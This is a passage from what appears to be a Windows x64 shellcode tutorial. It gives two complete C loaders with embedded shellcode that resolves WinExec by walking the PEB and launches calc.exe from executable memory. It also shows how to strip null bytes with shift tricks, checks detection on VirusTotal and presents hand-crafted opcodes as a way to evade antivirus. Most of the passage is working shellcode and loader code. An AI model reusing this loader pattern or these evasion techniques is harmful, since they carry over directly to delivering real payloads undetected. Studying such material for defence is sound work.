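# A C-string style copy stops at the first zero byte; a length-based copy does not.
string_copy = mov_gs.split(b"\x00", 1)[0]
print(len(string_copy), len(mov_gs))
```

In both instructions the zeros are the upper bytes of a 32-bit displacement whose value fits in one byte.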

#include "Windows.h"

int main()
{
	unsigned char shellcode[] =
		"\x65\x48\x8b\x1c\x25\x60\x00\x00\x00\x48\x8b\x5b\x18\x48\x8b\x5b\x20"\
		"\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd9\x48\x31\xdb\x48"\
		"\x31\xd2\x66\x41\x8b\x59\x3c\x4c\x01\xcb\x8b\x93\x88\x00\x00\x00\x4c"\
		"\x01\xca\x49\x89\xd0\x48\x31\xdb\x8b\x5a\x20\x4c\x01\xcb\x48\x89\xde"\
		"\x48\xba\x41\x57\x69\x6e\x45\x78\x65\x63\x48\xc1\xea\x08\x48\x31\xc9"\
		"\x48\xff\xc1\x48\x31\xc0\x8b\x04\x8e\x4c\x01\xc8\x48\x39\x10\x75\xef"\
		"\x48\x31\xd2\xb2\x04\x48\x0f\xaf\xca\x48\x31\xdb\x41\x8b\x58\x1c\x4c"\
		"\x01\xcb\x8b\x14\x0b\x4c\x01\xca\x48\x89\xd7\x48\x31\xd2\x52\x52\x48"\
		"\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x89\xe1\x48\x83\xec\x50"\
		"\xff\xd7\x48\x83\xc4\x50\xc3";

	void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (exec != 0) {
		memcpy(exec, shellcode, sizeof shellcode);
		((void(*)())exec)();
	}
	return 0;
}

FirstShellcode

Our dynamic shellcode is working perfectly. Now let's check the sample in VirusTotal for detections.

Link to CalcShellcode.exe sample

VT-1

This link is for the executable we created from the assembly code.

Link to sample of executable with shellcode

VT-2

The shellcode executed within the wrapper C++ code raises more suspicion because of its API calls and other detection rules.

Removing null bytes via shifting operation (lines marked > are the original instructions, lines marked < are their replacements),

> mov rbx, [gs:0x60];

< xor rbx,rbx;
< mov ebx,0x60414141;
< shr ebx,24;
< mov rbx, [gs:ebx];

> mov edx, [rbx+0x88];

< xor rcx,rcx;
< mov ecx,0x88414141;
< shr ecx,24;
< mov edx, [rbx+rcx];
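The padded immediates can be checked in the same way as the WinExec constant. This small sketch confirms that the shift recovers the wanted offset and that the padded value encodes without zero bytes; the helper names are illustrative.

```python
def top_byte(immediate: int) -> int:
    """Value left in a 32-bit register after `shr reg, 24`."""
    return immediate >> 24

def has_null(value: int) -> bool:
    """True if the 32-bit little-endian encoding of value contains a zero byte."""
    return 0 in value.to_bytes(4, "little")

for padded, wanted in ((0x60414141, 0x60), (0x88414141, 0x88)):
    print(hex(top_byte(padded)), has_null(padded), has_null(wanted))
```

The 0x41 filler bytes are arbitrary; any non-zero filler gives the same result after the shift.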

The trade-off is that this substitution introduces new instructions and increases the shellcode size. When compared to automated frameworks like Metasploit, creating shellcode by hand like this gives a better chance of evasion, since the signature can be changed by altering the opcodes in it, although it is no guarantee. The newly updated dynamic shellcode for popping calc.exe will be 175 bytes (sizeof reports 176 because the string literal adds a terminating null),

#include "Windows.h"

int main()
{
	unsigned char shellcode[] =
		"\x48\x31\xdb\xbb\x41\x41\x41\x60\xc1\xeb\x18\x65\x67\x48\x8b\x1b\x48"\
		"\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20"\
		"\x49\x89\xd9\x48\x31\xdb\x48\x31\xd2\x66\x41\x8b\x59\x3c\x4c\x01\xcb"\
		"\x48\x31\xc9\xb9\x41\x41\x41\x88\xc1\xe9\x18\x8b\x14\x0b\x4c\x01\xca"\
		"\x49\x89\xd0\x48\x31\xdb\x8b\x5a\x20\x4c\x01\xcb\x48\x89\xde\x48\xba"\
		"\x41\x57\x69\x6e\x45\x78\x65\x63\x48\xc1\xea\x08\x48\x31\xc9\x48\xff"\
		"\xc1\x48\x31\xc0\x8b\x04\x8e\x4c\x01\xc8\x48\x39\x10\x75\xef\x48\x31"\
		"\xd2\xb2\x04\x48\x0f\xaf\xca\x48\x31\xdb\x41\x8b\x58\x1c\x4c\x01\xcb"\
		"\x8b\x14\x0b\x4c\x01\xca\x48\x89\xd7\x48\x31\xd2\x52\x52\x48\xb9\x63"\
		"\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x89\xe1\x48\x83\xec\x50\xff\xd7"\
		"\x48\x83\xc4\x50\xc3";

	void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (exec != 0) {
		memcpy(exec, shellcode, sizeof shellcode);
		((void(*)())exec)();
	}
	return 0;
}

References

tophertimzen - Windows Shellcode

Windows x64 Shellcode Development